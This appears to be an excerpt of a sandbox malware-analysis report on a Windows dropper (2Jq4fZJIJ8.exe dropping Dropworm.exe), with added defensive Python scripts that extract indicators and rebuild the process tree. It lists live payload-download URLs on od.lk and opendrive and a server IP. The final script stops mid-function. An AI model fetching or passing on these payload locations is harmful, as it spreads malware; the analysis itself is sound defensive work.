            Source: 2Jq4fZJIJ8.exe, 00000008.00000003.1971631485.00000000033CF000.00000004.00000020.00020000.00000000.sdmp, 2Jq4fZJIJ8.exe, 00000008.00000003.1663721780.00000000033CF000.00000004.00000020.00020000.00000000.sdmp, 2Jq4fZJIJ8.exe, 00000008.00000003.2036334999.00000000033CF000.00000004.00000020.00020000.00000000.sdmp, 2Jq4fZJIJ8.exe, 00000008.00000002.2432572239.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, 2Jq4fZJIJ8.exe, 00000008.00000003.1817986444.00000000033CF000.00000004.00000020.00020000.00000000.sdmp, 2Jq4fZJIJ8.exe, 00000008.00000003.2136016965.00000000033CF000.00000004.00000020.00020000.00000000.sdmp, 2Jq4fZJIJ8.exe, 00000008.00000003.1753723572.00000000033CF000.00000004.00000020.00020000.00000000.sdmp, 2Jq4fZJIJ8.exe, 00000008.00000003.2194439736.00000000033CF000.00000004.00000020.00020000.00000000.sdmp, Dropworm.exe, 0000000C.00000003.2178764189.000000000341C000.00000004.00000020.00020000.00000000.sdmp, Dropworm.exe, 0000000C.00000002.2433018640.0000000003412000.00000004.00000020.00020000.00000000.sdmp, Dropworm.exe, 0000000C.00000002.2433540354.00000000050C0000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://web.opendrive.com/api/download/file.json/MzdfMzIxNzQ4MzhfWGo3SW8?test=1&inline=0
            Source: 2Jq4fZJIJ8.exe, 00000008.00000003.1971631485.00000000033CF000.00000004.00000020.00020000.00000000.sdmp, 2Jq4fZJIJ8.exe, 00000008.00000003.1663721780.00000000033CF000.00000004.00000020.00020000.00000000.sdmp, 2Jq4fZJIJ8.exe, 00000008.00000003.2036334999.00000000033CF000.00000004.00000020.00020000.00000000.sdmp, 2Jq4fZJIJ8.exe, 00000008.00000002.2432572239.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, 2Jq4fZJIJ8.exe, 00000008.00000003.1817986444.00000000033CF000.00000004.00000020.00020000.00000000.sdmp, 2Jq4fZJIJ8.exe, 00000008.00000003.2136016965.00000000033CF000.00000004.00000020.00020000.00000000.sdmp, 2Jq4fZJIJ8.exe, 00000008.00000003.1753723572.00000000033CF000.00000004.00000020.00020000.00000000.sdmp, 2Jq4fZJIJ8.exe, 00000008.00000003.2194439736.00000000033CF000.00000004.00000020.00020000.00000000.sdmp, Dropworm.exe, 0000000C.00000003.2178764189.000000000341C000.00000004.00000020.00020000.00000000.sdmp, Dropworm.exe, 0000000C.00000002.2433018640.0000000003412000.00000004.00000020.00020000.00000000.sdmp, Dropworm.exe, 0000000C.00000002.2433540354.00000000050C0000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://web.opendrive.com/api/file/info.json/MzdfMzIxNzQ4MzhfWGo3SW8?sharing_id=
            Source: 2Jq4fZJIJ8.exe, 00000008.00000003.1971631485.00000000033CF000.00000004.00000020.00020000.00000000.sdmp, 2Jq4fZJIJ8.exe, 00000008.00000003.1663721780.00000000033CF000.00000004.00000020.00020000.00000000.sdmp, 2Jq4fZJIJ8.exe, 00000008.00000003.2036334999.00000000033CF000.00000004.00000020.00020000.00000000.sdmp, 2Jq4fZJIJ8.exe, 00000008.00000002.2432572239.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, 2Jq4fZJIJ8.exe, 00000008.00000003.1817986444.00000000033CF000.00000004.00000020.00020000.00000000.sdmp, 2Jq4fZJIJ8.exe, 00000008.00000003.2136016965.00000000033CF000.00000004.00000020.00020000.00000000.sdmp, 2Jq4fZJIJ8.exe, 00000008.00000003.1753723572.00000000033CF000.00000004.00000020.00020000.00000000.sdmp, 2Jq4fZJIJ8.exe, 00000008.00000003.2194439736.00000000033CF000.00000004.00000020.00020000.00000000.sdmp, Dropworm.exe, 0000000C.00000003.2178764189.000000000341C000.00000004.00000020.00020000.00000000.sdmp, Dropworm.exe, 0000000C.00000002.2433540354.00000000050C0000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.opendrive.com
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49722
            Source: unknown | Network traffic detected: HTTP traffic on port 49733 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49721
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49720
            Source: unknown | Network traffic detected: HTTP traffic on port 49731 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 49727 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 49725 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 49729 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 49720 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 49722 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49739
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49738
            Source: unknown | Network traffic detected: HTTP traffic on port 49736 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49737
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49736
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49735
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49734
            Source: unknown | Network traffic detected: HTTP traffic on port 49738 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49733
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49732
            Source: unknown | Network traffic detected: HTTP traffic on port 49734 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49731
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49730
            Source: unknown | Network traffic detected: HTTP traffic on port 49732 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 49730 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 49726 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 49724 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 49728 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 49721 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 49723 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49729
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49728
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49727
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49726
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49725
            Source: unknown | Network traffic detected: HTTP traffic on port 49735 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49724
            Source: unknown | Network traffic detected: HTTP traffic on port 49737 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49723
            Source: unknown | Network traffic detected: HTTP traffic on port 49739 -> 443
            Source: unknown | HTTPS traffic detected: 38.108.185.115:443 -> 192.168.2.4:49720 version: TLS 1.2
            Source: unknown | HTTPS traffic detected: 38.108.185.115:443 -> 192.168.2.4:49723 version: TLS 1.2
            Source: unknown | HTTPS traffic detected: 38.108.185.115:443 -> 192.168.2.4:49725 version: TLS 1.2
            Source: unknown | HTTPS traffic detected: 38.108.185.115:443 -> 192.168.2.4:49728 version: TLS 1.2
            Source: unknown | HTTPS traffic detected: 38.108.185.115:443 -> 192.168.2.4:49733 version: TLS 1.2
            Source: unknown | HTTPS traffic detected: 38.108.185.115:443 -> 192.168.2.4:49736 version: TLS 1.2
            Source: unknown | HTTPS traffic detected: 38.108.185.115:443 -> 192.168.2.4:49738 version: TLS 1.2
            Source: unknown | HTTPS traffic detected: 38.108.185.115:443 -> 192.168.2.4:49739 version: TLS 1.2
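The string and network rows above are what an analyst turns into blockable indicators, but the same URL appears dozens of times with different one- or two-character tails because the memory string scanner keeps whatever printable bytes happen to follow the URL. The example below is added here and is not part of the Joe Sandbox report: it parses rows in the report's raw text form (the Source column fused onto the detail column, as in the rows above), collapses the residue-suffixed duplicates, groups the surviving URLs by host, and pairs the port-only traffic rows with the TLS rows to name the server. The sample rows are copied from the report; the suffix-collapsing rule and the host classification (OCSP/cert hosts assumed to come from the embedded Authenticode chain, everything else treated as a payload or C2 host) are this example's own heuristics, not something the sandbox does.

```python
"""Added example (not part of the Joe Sandbox report): turn the report's
"String found in binary or memory" and "Network traffic detected" rows into a
de-duplicated IOC list. Sample rows are copied from the report in raw text
form; the collapsing rule and host classification are this example's own."""
import re
from collections import defaultdict
from urllib.parse import urlsplit

# Constructed input: rows copied from the report above, raw (column-fused) form.
SAMPLE_ROWS = """\
Source: Dropworm.exe, 0000000C.00000002.2433018640.000000000342F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.starfieldtech.com/0F
Source: Dropworm.exe, 0000000C.00000002.2433018640.0000000003423000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://od.lk/
Source: 2Jq4fZJIJ8.exe, 00000008.00000002.2432572239.00000000033D6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://od.lk/04c
Source: 2Jq4fZJIJ8.exe, 00000008.00000003.1663721780.00000000033D6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://od.lk/AppData
Source: Dropworm.exe, 0000000C.00000002.2433018640.00000000033C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://od.lk/d/MzdfMzIxNzQ4Mzhf/WbUFEtl105.bin
Source: Dropworm.exe, 0000000C.00000002.2433018640.00000000033C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://od.lk/d/MzdfMzIxNzQ4Mzhf/WbUFEtl105.bin)
Source: 2Jq4fZJIJ8.exe, 00000008.00000002.2432572239.00000000033A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://od.lk/d/MzdfMzIxNzQ4Mzhf/WbUFEtl105.binF
Source: Dropworm.exe, 0000000C.00000002.2433540354.00000000050C0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://web.opendrive.com/api/download/file.json/MzdfMzIxNzQ4MzhfWGo3SW8?test=1&inline=0
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
Source: unknownHTTPS traffic detected: 38.108.185.115:443 -> 192.168.2.4:49720 version: TLS 1.2
Source: unknownHTTPS traffic detected: 38.108.185.115:443 -> 192.168.2.4:49733 version: TLS 1.2
"""

URL_ROW = re.compile(r"String found in binary or memory: (\S+)$")
PORT_ROW = re.compile(r"HTTP traffic on port (\d+) -> (\d+)$")
TLS_ROW = re.compile(r"HTTPS traffic detected: ([\d.]+):(\d+) -> ([\d.]+):(\d+) version: (.+)$")

# Certificate-infrastructure hosts (assumption: AIA/OCSP URLs of the embedded
# Authenticode chain, which the report flags as invalid) versus everything else.
CERT_INFRA_PREFIXES = ("ocsp.", "certs.", "crl.")


def _is_residue_of(url, base):
    """Heuristic (assumption): `url` is `base` plus scanner residue if it starts
    with `base` and the remainder holds neither a path separator nor a query
    assignment, e.g. "...bin)" of "...bin" or "od.lk/04c" of "od.lk/"."""
    return url.startswith(base) and set(url[len(base):]).isdisjoint("/=")


def collapse_urls(raw_urls):
    """Keep the shortest observed form of each URL, dropping residue variants."""
    canonical = []
    for url in sorted(set(raw_urls), key=len):          # shortest first
        if not any(_is_residue_of(url, base) for base in canonical):
            canonical.append(url)
    return sorted(canonical)


def classify_host(host):
    return "cert-infra" if host.startswith(CERT_INFRA_PREFIXES) else "payload-or-c2"


def extract_iocs(text):
    """Parse report rows into hosts/URLs, port flows and TLS sessions."""
    urls, flows, tls = [], defaultdict(set), {}
    for line in text.splitlines():
        if m := URL_ROW.search(line):
            urls.append(m.group(1))
        elif m := PORT_ROW.search(line):
            a, b = int(m.group(1)), int(m.group(2))
            server, client = min(a, b), max(a, b)       # well-known port is the smaller
            flows[server].add(client)
        elif m := TLS_ROW.search(line):
            srv_ip, srv_port, _cli_ip, cli_port, version = m.groups()
            tls[int(cli_port)] = (srv_ip, int(srv_port), version)
    by_host = defaultdict(list)
    for url in collapse_urls(urls):
        by_host[urlsplit(url).hostname or url].append(url)
    return {
        "hosts": {h: {"class": classify_host(h), "urls": u} for h, u in by_host.items()},
        "flows": {srv: sorted(clients) for srv, clients in flows.items()},
        "tls_sessions": tls,
    }


if __name__ == "__main__":
    import json
    print(json.dumps(extract_iocs(SAMPLE_ROWS), indent=2))
```

Run it over the whole exported report rather than the sample and the od.lk download path, the web.opendrive.com API endpoints and 38.108.185.115:443 fall out as the indicators worth blocking, while the Starfield OCSP and repository URLs are set aside as certificate-chain noise. The collapsing rule is deliberately conservative: a residue that happens to contain a slash (the "od.lk/or/" and "od.lk/od.lk/" rows above) survives as a separate entry and still needs a human look.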
            Source: C:\Users\user\Desktop\2Jq4fZJIJ8.exe | Code function: 0_2_00405050 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,LdrInitializeThunk,SendMessageA,CreatePopupMenu,LdrInitializeThunk,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,LdrInitializeThunk,SetClipboardData,CloseClipboard
            Source: C:\Users\user\Desktop\2Jq4fZJIJ8.exe | Code function: 0_2_004030D9 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,LdrInitializeThunk,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,LdrInitializeThunk,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess
            Source: C:\Users\user\Desktop\2Jq4fZJIJ8.exe | Code function: 8_2_004030D9 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,LdrInitializeThunk,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,LdrInitializeThunk,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess
            Source: C:\Users\user\AppData\Local\Temp\Kunderegistrets\Dropworm.exe | Code function: 9_2_004030D9 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,LdrInitializeThunk,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,LdrInitializeThunk,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess
            Source: C:\Users\user\Desktop\2Jq4fZJIJ8.exe | File created: C:\Windows\resources\0809
            Source: C:\Users\user\Desktop\2Jq4fZJIJ8.exe | File created: C:\Windows\resources\0809\Godtager22
            Source: C:\Users\user\Desktop\2Jq4fZJIJ8.exe | Code function: 0_2_00406344
            Source: C:\Users\user\Desktop\2Jq4fZJIJ8.exe | Code function: 0_2_0040488F
            Source: C:\Users\user\Desktop\2Jq4fZJIJ8.exe | Code function: 8_2_00406344
            Source: C:\Users\user\Desktop\2Jq4fZJIJ8.exe | Code function: 8_2_0040488F
            Source: C:\Users\user\AppData\Local\Temp\Kunderegistrets\Dropworm.exe | Code function: 9_2_00406344
            Source: C:\Users\user\AppData\Local\Temp\Kunderegistrets\Dropworm.exe | Code function: 9_2_0040488F
            Source: Joe Sandbox View | Dropped File: C:\Users\user\AppData\Local\Temp\nseAD0E.tmp\System.dll 98BCD1DD88642F4DD36A300C76EBB1DDFBBBC5BFC7E3B6D7435DC6D6E030C13B
            Source: C:\Users\user\Desktop\2Jq4fZJIJ8.exe | Code function: String function: 00402A3A appears 52 times
            Source: 2Jq4fZJIJ8.exe | Static PE information: invalid certificate
            Source: 2Jq4fZJIJ8.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            Source: classification engine | Classification label: mal100.troj.evad.winEXE@6/17@1/1
            Source: C:\Users\user\Desktop\2Jq4fZJIJ8.exe | Code function: 0_2_004030D9 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,LdrInitializeThunk,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,LdrInitializeThunk,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess
            Source: C:\Users\user\Desktop\2Jq4fZJIJ8.exe | Code function: 8_2_004030D9 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,LdrInitializeThunk,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,LdrInitializeThunk,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess
            Source: C:\Users\user\AppData\Local\Temp\Kunderegistrets\Dropworm.exe | Code function: 9_2_004030D9 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,LdrInitializeThunk,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,LdrInitializeThunk,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess
            Source: C:\Users\user\Desktop\2Jq4fZJIJ8.exe | Code function: 0_2_0040431C GetDlgItem,SetWindowTextA,LdrInitializeThunk,LdrInitializeThunk,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,LdrInitializeThunk,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA
            Source: C:\Users\user\Desktop\2Jq4fZJIJ8.exe | Code function: 0_2_0040205E LdrInitializeThunk,CoCreateInstance,MultiByteToWideChar,LdrInitializeThunk
            Source: C:\Users\user\Desktop\2Jq4fZJIJ8.exe | File created: C:\Users\user\kompatible
            Source: C:\Users\user\Desktop\2Jq4fZJIJ8.exe | File created: C:\Users\user\AppData\Local\Temp\nsnDDE5.tmp
            Source: 2Jq4fZJIJ8.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\2Jq4fZJIJ8.exe | File read: C:\Users\desktop.ini
            Source: C:\Users\user\Desktop\2Jq4fZJIJ8.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: 2Jq4fZJIJ8.exe | Virustotal: Detection: 65%
            Source: 2Jq4fZJIJ8.exe | ReversingLabs: Detection: 52%
            Source: C:\Users\user\Desktop\2Jq4fZJIJ8.exe | File read: C:\Users\user\Desktop\2Jq4fZJIJ8.exe
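The "Code function" rows list the imported API calls a routine makes in the order the disassembler sees them, and the sandbox derives its capability signatures from that order: OpenProcessToken followed by LookupPrivilegeValueA, AdjustTokenPrivileges and ExitWindowsEx is what backs the shutdown/reboot finding, and the same routine at address 004030D9 shows up in the original process (0_2), its re-launched copy (8_2) and the dropped Dropworm.exe (9_2), which is the installer entry point that all three share. The example below is added here and is not part of the Joe Sandbox report: it parses the rows in the report's raw text form, matches ordered (not necessarily adjacent) call subsequences against a small signature table of this example's own choosing, and groups hits by code address so the same routine is recognised across processes. The 8_2 and 9_2 rows are rebuilt from the 0_2_004030D9 call list because the report prints the same calls for all three; the 0_2_00405050 row is abbreviated to its clipboard tail.

```python
"""Added example (not part of the Joe Sandbox report): triage "Code function"
rows by ordered API-call subsequences and group hits by code address. Rows are
rebuilt from the report's rows; the signature table is this example's own."""
import re
from collections import defaultdict

# Call list of 0_2_004030D9 exactly as printed in the report; the 8_2 and 9_2
# rows list the same calls, so they are rebuilt from it rather than repeated.
STUB_CALLS = (
    "EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,"
    "GetCommandLineA,GetModuleHandleA,CharNextA,LdrInitializeThunk,GetTempPathA,"
    "GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,"
    "SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,"
    "DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,"
    "SetCurrentDirectoryA,DeleteFileA,LdrInitializeThunk,CopyFileA,CloseHandle,"
    "GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,"
    "ExitWindowsEx,ExitProcess"
)
# Tail of the 0_2_00405050 call list (abbreviated to the clipboard part).
CLIP_CALLS = ("GetDlgItem,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,"
              "SendMessageA,GlobalUnlock,LdrInitializeThunk,SetClipboardData,CloseClipboard")
MAIN = r"C:\Users\user\Desktop\2Jq4fZJIJ8.exe"
DROP = r"C:\Users\user\AppData\Local\Temp\Kunderegistrets\Dropworm.exe"
# Constructed input in the report's raw (column-fused) row format.
SAMPLE_ROWS = "\n".join([
    f"Source: {MAIN}Code function: 0_2_00405050 {CLIP_CALLS},0_2_00405050",
    f"Source: {MAIN}Code function: 0_2_004030D9 {STUB_CALLS},0_2_004030D9",
    f"Source: {MAIN}Code function: 8_2_004030D9 {STUB_CALLS},8_2_004030D9",
    f"Source: {DROP}Code function: 9_2_004030D9 {STUB_CALLS},9_2_004030D9",
    f"Source: {MAIN}Code function: 0_2_004063440_2_00406344",   # row without a call list
])

# <source> Code function: <pid>_<run>_<8 hex address> <calls>,<id again>
# The trailing id is the report's disassembly-link column; " | " is accepted so
# rows with the columns separated parse too.
CODE_ROW = re.compile(
    r"^Source: (.*?)(?: \| )?Code function: (\d+_\d+_[0-9A-F]{8})\s*(.*?)(?:,?\2)?$")

# Ordered call patterns and what they indicate (example's own table).
SIGNATURES = {
    "privilege adjust then ExitWindowsEx (shutdown/reboot)":
        ("OpenProcessToken", "LookupPrivilegeValueA", "AdjustTokenPrivileges", "ExitWindowsEx"),
    "clipboard access": ("OpenClipboard", "SetClipboardData", "CloseClipboard"),
    "temp-directory staging": ("GetTempPathA", "SetEnvironmentVariableA", "CopyFileA"),
    "loader internals (LdrInitializeThunk)": ("LdrInitializeThunk",),
}


def contains_in_order(calls, pattern):
    """True if every name in `pattern` occurs in `calls` in that order.
    `name in it` advances the iterator, so each call satisfies at most one step."""
    it = iter(calls)
    return all(name in it for name in pattern)


def triage(text):
    """Return per-function hits plus a map of code address -> processes using it."""
    functions, by_address = {}, defaultdict(list)
    for line in text.splitlines():
        m = CODE_ROW.match(line.strip())
        if not m:
            continue
        source, func_id, call_str = m.groups()
        calls = [c for c in call_str.split(",") if c]
        hits = [name for name, pat in SIGNATURES.items() if contains_in_order(calls, pat)]
        functions[func_id] = {"source": source, "calls": calls, "hits": hits}
        pid_run, address = func_id.rsplit("_", 1)
        by_address[address].append(pid_run)
    return {"functions": functions, "by_address": dict(by_address)}


if __name__ == "__main__":
    report = triage(SAMPLE_ROWS)
    for func_id, info in report["functions"].items():
        print(func_id, len(info["calls"]), "calls:", "; ".join(info["hits"]) or "-")
    print("shared code:", report["by_address"])
```

The by_address grouping is the useful part when reading a dropper report: three distinct process/run ids resolving to one address means one binary image, so findings raised on the dropped file are the same code as the submitted sample and do not need separate triage.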
            Source: unknown | Process created: C:\Users\user\Desktop\2Jq4fZJIJ8.exe "C:\Users\user\Desktop\2Jq4fZJIJ8.exe"
            Source: C:\Users\user\Desktop\2Jq4fZJIJ8.exe | Process created: C:\Users\user\Desktop\2Jq4fZJIJ8.exe "C:\Users\user\Desktop\2Jq4fZJIJ8.exe"
            Source: unknown | Process created: C:\Users\user\AppData\Local\Temp\Kunderegistrets\Dropworm.exe "C:\Users\user\AppData\Local\Temp\Kunderegistrets\Dropworm.exe"
            Source: C:\Users\user\AppData\Local\Temp\Kunderegistrets\Dropworm.exe | Process created: C:\Users\user\AppData\Local\Temp\Kunderegistrets\Dropworm.exe "C:\Users\user\AppData\Local\Temp\Kunderegistrets\Dropworm.exe"
            Source: C:\Users\user\Desktop\2Jq4fZJIJ8.exe | Process created: C:\Users\user\Desktop\2Jq4fZJIJ8.exe "C:\Users\user\Desktop\2Jq4fZJIJ8.exe"
            Source: C:\Users\user\AppData\Local\Temp\Kunderegistrets\Dropworm.exe | Process created: C:\Users\user\AppData\Local\Temp\Kunderegistrets\Dropworm.exe "C:\Users\user\AppData\Local\Temp\Kunderegistrets\Dropworm.exe"
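The process rows tell the loader story in four events: the submitted sample re-launches its own image, a second executable starts from a directory under %TEMP% with no monitored parent, and that executable in turn re-launches itself. A process starting a copy of its own image is the usual prelude to writing a payload into the suspended child, and a process with no parent in the tree is one the sandbox did not see spawned (an autostart or a scheduled start, for instance). The example below is added here and is not part of the Joe Sandbox report: it parses the rows in the report's raw text form (Source column fused onto the detail, "Jump to behavior" link text still attached), de-duplicates events the report repeats under several signatures, builds the parent-to-child tree and applies those three checks. The rows are copied from the report; the de-duplication and the checks are this example's own.

```python
"""Added example (not part of the Joe Sandbox report): rebuild the process tree
from "Process created" rows and flag self-spawn, execution from %TEMP% and a
missing parent. Rows are copied from the report; the checks are this example's."""
import re
from collections import defaultdict

# Constructed input: rows copied from the report above in raw (column-fused) form;
# the last row is the report's own repeat of the second, with link text attached.
SAMPLE_ROWS = r"""
Source: unknownProcess created: C:\Users\user\Desktop\2Jq4fZJIJ8.exe "C:\Users\user\Desktop\2Jq4fZJIJ8.exe"
Source: C:\Users\user\Desktop\2Jq4fZJIJ8.exeProcess created: C:\Users\user\Desktop\2Jq4fZJIJ8.exe "C:\Users\user\Desktop\2Jq4fZJIJ8.exe"
Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\Kunderegistrets\Dropworm.exe "C:\Users\user\AppData\Local\Temp\Kunderegistrets\Dropworm.exe"
Source: C:\Users\user\AppData\Local\Temp\Kunderegistrets\Dropworm.exeProcess created: C:\Users\user\AppData\Local\Temp\Kunderegistrets\Dropworm.exe "C:\Users\user\AppData\Local\Temp\Kunderegistrets\Dropworm.exe"
Source: C:\Users\user\Desktop\2Jq4fZJIJ8.exeProcess created: C:\Users\user\Desktop\2Jq4fZJIJ8.exe "C:\Users\user\Desktop\2Jq4fZJIJ8.exe"Jump to behavior
"""

# <parent image> Process created: <child image> "<command line>"  (+ optional link text)
PROC_ROW = re.compile(
    r'^Source: (.*?)(?: \| )?Process created: (.+?) "(.*?)"(?: \| )?(?:Jump to behavior)?$')
TEMP_MARKER = "\\appdata\\local\\temp\\"        # matched case-insensitively below


def parse_events(text):
    """Return unique (parent_image, child_image, cmdline) tuples in report order."""
    events, seen = [], set()
    for line in text.strip().splitlines():
        m = PROC_ROW.match(line.strip())
        if not m:
            continue
        parent, image, cmdline = m.groups()
        key = (parent.lower(), image.lower(), cmdline)
        if key not in seen:             # the report repeats events under several signatures
            seen.add(key)
            events.append((parent, image, cmdline))
    return events


def build_tree(events):
    """Map each parent image ("unknown" for unmonitored parents) to its children."""
    children = defaultdict(list)
    for parent, image, _ in events:
        children[parent].append(image)
    return dict(children)


def find_findings(events):
    """Apply the three loader checks; each (kind, image) is reported once."""
    findings, roots = [], []

    def add(kind, image):
        if (kind, image) not in findings:
            findings.append((kind, image))

    for parent, image, _ in events:
        if parent == "unknown":
            roots.append(image)
            if len(roots) > 1:          # the first root is the submitted sample itself
                add("unknown_parent", image)
        elif parent.lower() == image.lower():
            add("self_spawn", image)
        if TEMP_MARKER in image.lower():
            add("runs_from_temp", image)
    return findings


if __name__ == "__main__":
    evts = parse_events(SAMPLE_ROWS)
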